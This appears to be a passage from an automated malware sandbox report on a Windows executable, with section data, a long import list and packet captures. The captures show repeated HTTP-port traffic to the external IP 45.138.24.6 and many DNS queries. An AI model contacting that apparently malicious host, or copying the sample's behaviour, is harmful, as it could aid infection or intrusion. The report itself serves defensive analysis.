                                                                                                                                    .rdata0x70000xbc040xbe00False0.910916940789data7.78728301124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x130000x4c540x4c00False0.392012746711data5.55064315745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x180000x94c0xa00False0.769140625data6.11533115786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllLoadLibraryA, GetProcAddress, FileTimeToSystemTime, GetComputerNameExW, GetConsoleMode, SetConsoleMode, ReadFile, ReadConsoleW, MultiByteToWideChar, LoadLibraryW, FreeLibrary, lstrcpynW, WideCharToMultiByte, VerSetConditionMask, VerifyVersionInfoW, GetModuleHandleA, LocalFree, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, GetStdHandle, WriteConsoleW, FormatMessageW, LocalAlloc, SetLastError, GetNumberFormatW, InterlockedDecrement, CreateFileW, CreateFileMappingW, CloseHandle, MapViewOfFile, GetDateFormatW, GetTimeFormatW, lstrcatW, UnmapViewOfFile, InterlockedIncrement, lstrcmpW, lstrcmpiW, lstrlenW, lstrcpyW, GetLastError, GetModuleHandleW, GetLocaleInfoW, GetUserDefaultLCID, EraseTape, VirtualFreeEx, FindNextVolumeMountPointA, GetVersionExA, GetBinaryTypeW, WritePrivateProfileStringW, EnumResourceTypesA, InterlockedExchangeAdd, DefineDosDeviceW, lstrcat, AddAtomA, SetEnvironmentVariableW, RaiseException, IsDebuggerPresent, ExitProcess, HeapReAlloc, HeapSize, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapDestroy, HeapCreate, VirtualFree, GetACP, GetOEMCP, IsValidCodePage, SetStdHandle, CreateFileA, GetTimeFormatA, GetDateFormatA, GetTimeZoneInformation, FatalAppExitA, GetCurrentDirectoryA, SetCurrentDirectoryA, LCMapStringA, LCMapStringW, GetConsoleCP, SetConsoleCtrlHandler, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, GetDriveTypeA, GetFullPathNameA, SetEnvironmentVariableA, CreateDirectoryW, GetDiskFreeSpaceA, ExitThread, RtlUnwind, GetProcessHeap, HeapAlloc, HeapFree, GetTempFileNameW, GetFileTime, SetFileAttributesW, SetFileTime, LocalFileTimeToFileTime, GetAtomNameW, GlobalFlags, GetPrivateProfileIntW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, TlsGetValue, GlobalGetAtomNameW, WaitForMultipleObjects, ReleaseMutex, CreateMutexW, CreateSemaphoreW, GetShortPathNameW, GetFullPathNameW, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, GetThreadLocale, GetStringTypeExW, GlobalMemoryStatus, GetProfileStringW, InterlockedCompareExchange, GetProcessAffinityMask, QueryPerformanceFrequency, GetThreadPriority, MoveFileW, FindFirstFileW, FileTimeToLocalFileTime, FindNextFileW, FindClose, GlobalFindAtomW, CompareStringW, FreeResource, GlobalAddAtomW, SuspendThread, ResumeThread, GlobalDeleteAtom, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesW, lstrcmpA, CompareStringA, InterlockedExchange, GlobalSize, ReleaseSemaphore, CreateThread, SetThreadPriority, SystemTimeToFileTime, GetLogicalDriveStringsW, GetDriveTypeW, GetCPInfo, lstrlenA, GetVersion, OpenFileMappingW, GetSystemDirectoryW, GetExitCodeProcess, SetErrorMode, IsBadWritePtr, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetDiskFreeSpaceW, WinExec, MulDiv, LoadLibraryExW, GetStartupInfoW, CreateProcessW, GetComputerNameW, GetLocalTime, WaitNamedPipeW, WriteFile, DisconnectNamedPipe, GetModuleFileNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetTempPathW, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalReAlloc, GlobalFree, CreateEventW, Sleep, ResetEvent, WaitForSingleObject, CopyFileW, DeleteFileW, GetPrivateProfileStringW, GetFileAttributesW, SetEvent, GetVersionExW, GetWindowsDirectoryW, GetVolumeInformationW, FindResourceW, LoadResource, LockResource, SizeofResource
                                                                                                                                    USER32.dllLoadCursorA, CharUpperA, GetClipboardData, GetMessagePos, LoadStringW, wsprintfW, CharUpperW, ActivateKeyboardLayout, ToAscii, CharPrevExA, CreateIconIndirect, EnumWindows, LoadMenuIndirectW, FindWindowA, RemovePropA, ClientToScreen, GetKBCodePage, GetClipboardFormatNameW, SendMessageCallbackW, SetWindowPlacement, GetClassInfoA, SetLayeredWindowAttributes, SetClipboardData, SetWindowTextA, GetActiveWindow, EnumDesktopWindows, WINNLSGetIMEHotkey, GetListBoxInfo, SetMenu, TranslateAcceleratorW, IsZoomed, MsgWaitForMultipleObjects, FindWindowW, MapVirtualKeyW, GetKeyNameTextW, ScrollWindowEx, MoveWindow, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SetDlgItemInt, GetDlgItemTextW, GetDlgItemInt, CheckRadioButton, CheckDlgButton, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, GetClassLongW, SetPropW, GetPropW, RemovePropW, SetFocus, GetWindowTextLengthW, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, ScrollWindow, TrackPopupMenuEx, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, ShowScrollBar, GetMenu, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, DeferWindowPos, SetScrollInfo, GetDlgCtrlID, CallWindowProcW, SystemParametersInfoA, DestroyMenu, UnhookWindowsHookEx, SetWindowContextHelpId, MapDialogRect, SetWindowPos, SetActiveWindow, CreateDialogIndirectParamW, GetDlgItem, EndDialog, EndPaint, BeginPaint, GetWindowDC, ShowOwnedPopups, SetWindowsHookExW, GetMessageW, ValidateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, EnableMenuItem, PostQuitMessage, GetMenuStringW, InsertMenuItemW, MapWindowPoints, DrawFrameControl, CloseClipboard, OpenClipboard, RegisterClassExW, GetKeyState, MessageBeep, GetWindowPlacement, GetWindow, DestroyWindow, GetComboBoxInfo, IsMenu, GetNextDlgTabItem, DrawFocusRect, FrameRect, InflateRect, DrawStateW, GetMenuItemInfoW, DrawIconEx, GrayStringW, DrawTextExW, TabbedTextOutW, GetSysColorBrush, RemoveMenu, ModifyMenuW, InsertMenuW, GetMenuState, GetMenuItemID, GetMenuItemCount, CreatePopupMenu, CreateMenu, DrawEdge, SetForegroundWindow, GetLastActivePopup, ShowWindow, ShowCursor, SetWindowTextW, EnumThreadWindows, GetWindowThreadProcessId, MessageBoxW, GetDesktopWindow, GetScrollInfo, RegisterWindowMessageW, GetClassInfoW, DefWindowProcW, GetWindowTextW, ChildWindowFromPoint, IsWindowEnabled, GetClassNameW, IsWindow, WindowFromPoint, EqualRect, OffsetRect, SetRectEmpty, IsRectEmpty, DestroyCursor, LoadImageW, CopyRect, DestroyIcon, FillRect, GetIconInfo, GetMonitorInfoW, IntersectRect, PostThreadMessageW, RegisterClipboardFormatW, UnionRect, SetParent, LockWindowUpdate, GetDCEx, UnregisterClassW, GetNextDlgGroupItem, InvalidateRgn, CopyAcceleratorTableW, CharNextW, GetDialogBaseUnits, WaitMessage, UnpackDDElParam, ReuseDDElParam, GetCapture, LoadAcceleratorsW, MonitorFromWindow, MonitorFromRect, MonitorFromPoint, UnregisterClassA, ChildWindowFromPointEx, CreateIconFromResource, RedrawWindow, EnumDisplaySettingsW, EnumDisplayMonitors, SetCursor, ReleaseCapture, SetCapture, DrawTextW, GetWindowLongW, ReleaseDC, CreateWindowExW, GetSysColor, GetFocus, ScreenToClient, PeekMessageW, DispatchMessageW, TranslateMessage, SetWindowLongW, SetRect, SystemParametersInfoW, GetParent, GetDC, GetCursorPos, ExitWindowsEx, LoadCursorW, CopyIcon, GetSystemMetrics, LoadIconW, EnableWindow, KillTimer, SetTimer, IsWindowVisible, InvalidateRect, GetClientRect, GetWindowRect, BringWindowToTop, SetWindowRgn, IsIconic, GetSystemMenu, PostMessageW, SendMessageW, LoadMenuW, GetSubMenu, CheckMenuItem, AppendMenuW, DeleteMenu, DrawIcon, LoadBitmapW, PtInRect, UpdateWindow, CallNextHookEx
                                                                                                                                    GDI32.dllRealizePalette, GetBkMode, EngPlgBlt, EnumMetaFile, MaskBlt, FontIsLinked, CombineRgn, GetOutlineTextMetricsA, DeviceCapabilitiesExA, GetEnhMetaFileHeader, GetPath, FONTOBJ_cGetGlyphs, PolyDraw, DeleteObject, GetEnhMetaFileW, GdiAlphaBlend, GdiValidateHandle, GetWindowOrgEx, GetBrushOrgEx, GetPolyFillMode, GdiStartPageEMF, GdiArtificialDecrementDriver, GetSystemPaletteUse, GetCharWidthA, GdiDeleteSpoolFileHandle, GdiComment, EndPage, SwapBuffers, GetTextExtentPointW, ExcludeClipRect, IntersectClipRect, OffsetClipRgn, SetTextAlign, GetClipBox, SetMapperFlags, SetArcDirection, SetColorAdjustment, GetClipRgn, SelectClipPath, GetViewportExtEx, GetWindowExtEx, StartDocW, OffsetViewportOrgEx, ScaleViewportExtEx, SetWindowOrgEx, OffsetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, ArcTo, PolylineTo, PolyBezierTo, ExtSelectClipRgn, CreateDIBPatternBrushPt, CreatePatternBrush, SelectPalette, PlayMetaFileRecord, GetObjectType, PlayMetaFile, ExtCreatePen, GetDCOrgEx, CreateEllipticRgn, DPtoLP, LPtoDP, GetCharWidthW, StretchDIBits, SetRectRgn, GetMapMode, GetTextColor, GetRgnBox, OffsetRgn, CreatePolygonRgn, SetMapMode, ModifyWorldTransform, SetWorldTransform, SetGraphicsMode, FillRgn, SetStretchBltMode, GetCurrentObject, CreateFontW, SetROP2, SetPolyFillMode, RestoreDC, SaveDC, CopyMetaFileW, CreateDIBitmap, GetBitmapBits, CreateBitmapIndirect, RoundRect, Polygon, GetBkColor, GetStockObject, Escape, ExtTextOutW, RectVisible, PtVisible, GetPixel, PatBlt, Ellipse, SetTextCharacterExtra, CreatePalette, CreateICW, SelectClipRgn, FrameRgn, TextOutW, BitBlt, SelectObject, CreateBrushIndirect, CreateCompatibleDC, SetTextJustification, GetTextMetricsW, SetBkMode, SetBkColor, SetTextColor, CreateCompatibleBitmap, CreatePen, MoveToEx, LineTo, CreateSolidBrush, CreateBitmap, GetDeviceCaps, CreateDCW, SetViewportOrgEx, SetViewportExtEx, CreateFontIndirectW, PtInRegion, CreateRectRgnIndirect, SetPixel, RectInRegion, CreateRectRgn, GetTextExtentPoint32W, CreateDIBSection, ExtCreateRegion, CreateHatchBrush, DeleteDC, StretchBlt, Rectangle, CreateRoundRectRgn, CreatePenIndirect, GetObjectW
                                                                                                                                    COMDLG32.dllGetFileTitleW
                                                                                                                                    ADVAPI32.dllRegOpenKeyA, GetUserNameA, RegOpenKeyW, OpenThreadToken, GetTokenInformation, LookupAccountSidW, GetUserNameW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegQueryValueW, RegSetValueExW, RegCreateKeyExW, RegSetValueW, GetFileSecurityW, SetFileSecurityW, RegDeleteValueW, RegEnumKeyW, RegDeleteKeyW, RegEnumValueW, RegOpenKeyExA, RegQueryValueExA, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, RegCreateKeyW
                                                                                                                                    SHELL32.dllExtractIconEx, ExtractAssociatedIconExW, DragQueryPoint, SHBindToParent, SHFormatDrive, SHFileOperationW, ShellExecuteExA, SHAddToRecentDocs, SHGetPathFromIDListA, SHLoadInProc, SHGetDataFromIDListA, SHAppBarMessage, CheckEscapesW, SHCreateDirectoryExA, SHGetInstanceExplorer, SHEmptyRecycleBinA, ShellAboutW, ExtractAssociatedIconA, ExtractIconExA, SHGetSpecialFolderPathW, SHBrowseForFolder, SHGetFileInfoW, ShellExecuteEx, ExtractIconA, ShellExecuteA, DragQueryFileW, SHBrowseForFolderW, SHGetMalloc, ShellExecuteExW, ShellExecuteW, ExtractIconW, SHGetPathFromIDListW, DragFinish
                                                                                                                                    ole32.dllCoTaskMemFree, CoUninitialize, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoTaskMemAlloc, CoTreatAsClass, OleDuplicateData, CLSIDFromProgID, CLSIDFromString, CoDisconnectObject, StringFromGUID2, CoGetClassObject, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CreateILockBytesOnHGlobal, OleRun, OleUninitialize, CoFreeUnusedLibraries, StringFromCLSID, ReleaseStgMedium, CreateBindCtx, ReadClassStg, ReadFmtUserTypeStg, OleRegGetUserType, WriteClassStg, WriteFmtUserTypeStg, SetConvertStg, OleLoadFromStream, StgOpenStorage, StgCreateDocfile, OleSaveToStream, CreateStreamOnHGlobal, CoInitialize, OleInitialize, CoRegisterClassObject, CoRevokeClassObject, OleSetClipboard, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CoCreateGuid
                                                                                                                                    SHLWAPI.dllStrCmpNW, StrStrA, StrCmpNA, StrCmpNIA, StrStrIW, StrRChrIA, StrRChrW, StrChrIW, StrRStrIA, StrRChrA, StrStrW, PathFindExtensionW, PathRemoveExtensionW, PathFindFileNameW, PathStripToRootW, StrCpyW, PathIsUNCW
                                                                                                                                    COMCTL32.dllImageList_DrawEx, InitializeFlatSB, FlatSB_EnableScrollBar, FlatSB_ShowScrollBar, _TrackMouseEvent, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_GetIcon, ImageList_Create, ImageList_AddMasked

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 22, 2021 19:10:22.617885113 CET4974580192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:22.617888927 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:22.666860104 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:22.666884899 CET804974545.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:22.666951895 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:22.666986942 CET4974580192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:22.667568922 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:22.758059025 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.134596109 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.134711027 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.134989977 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.135060072 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.135426998 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.135530949 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.174979925 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.175055981 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.175235033 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.177165031 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.285795927 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.285978079 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.335072041 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.336395025 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.396493912 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.396569967 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.396650076 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.396694899 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.452797890 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.452946901 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.453026056 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.453061104 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.453422070 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.453485966 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.502082109 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.502454996 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.505542040 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.508346081 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.557418108 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.557553053 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.606640100 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.606719017 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.608025074 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.657092094 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.657216072 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.657309055 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.657390118 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.657757044 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.657885075 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.706262112 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.706382036 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.706610918 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.706859112 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.706984997 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.707087040 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.708419085 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.756025076 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.756139994 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.756223917 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.756302118 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.757293940 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.757425070 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.757466078 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.758801937 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.805191040 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.805326939 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.805593967 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.806318998 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.807698011 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.808415890 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.854692936 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.857016087 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.857332945 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.857780933 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.862390041 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.862411022 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.911525965 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.913652897 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:23.962605000 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:23.966424942 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.015460014 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.015664101 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.018472910 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.067526102 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.067713022 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.067750931 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.067785025 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.067962885 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.070378065 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.116827011 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.116936922 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.117074966 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.119405985 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.119520903 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.166134119 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.166495085 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.218903065 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.219024897 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.229723930 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.229844093 CET4974480192.168.2.645.138.24.6
                                                                                                                                    Jan 22, 2021 19:10:24.278942108 CET804974445.138.24.6192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:24.279057980 CET4974480192.168.2.645.138.24.6

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 22, 2021 19:09:20.207730055 CET5177453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:20.255502939 CET53517748.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:21.169020891 CET5602353192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:21.217185020 CET53560238.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:22.136482954 CET5838453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:22.184370041 CET53583848.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:23.273284912 CET6026153192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:23.321263075 CET53602618.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:24.286748886 CET5606153192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:24.334523916 CET53560618.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:25.319572926 CET5833653192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:25.379057884 CET53583368.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:26.446692944 CET5378153192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:26.494545937 CET53537818.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:27.435074091 CET5406453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:27.497457981 CET53540648.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:28.711690903 CET5281153192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:28.762445927 CET53528118.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:29.680368900 CET5529953192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:29.728425026 CET53552998.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:30.631432056 CET6374553192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:30.682051897 CET53637458.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:31.627109051 CET5005553192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:31.675026894 CET53500558.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:32.612448931 CET6137453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:32.663088083 CET53613748.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:33.557326078 CET5033953192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:33.605140924 CET53503398.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:34.499284983 CET6330753192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:34.547852993 CET53633078.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:49.075234890 CET4969453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:49.126000881 CET53496948.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:09:54.004606962 CET5498253192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:09:54.064604044 CET53549828.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:07.579437971 CET5001053192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:07.635879993 CET53500108.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:08.430217981 CET6371853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:08.491597891 CET53637188.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:08.668416023 CET6211653192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:08.724656105 CET53621168.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:09.084597111 CET6381653192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:09.094732046 CET5501453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:09.143701077 CET53638168.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:09.168463945 CET53550148.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:09.577442884 CET6220853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:09.636456013 CET53622088.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:09.978952885 CET5757453192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:10.026921034 CET53575748.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:10.270545006 CET5181853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:10.329685926 CET53518188.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:10.843564034 CET5662853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:10.899643898 CET53566288.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:11.713043928 CET6077853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:11.769557953 CET53607788.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:12.696830034 CET5379953192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:12.747627974 CET53537998.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:13.164814949 CET5468353192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:13.222481012 CET53546838.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:13.585326910 CET5932953192.168.2.68.8.8.8
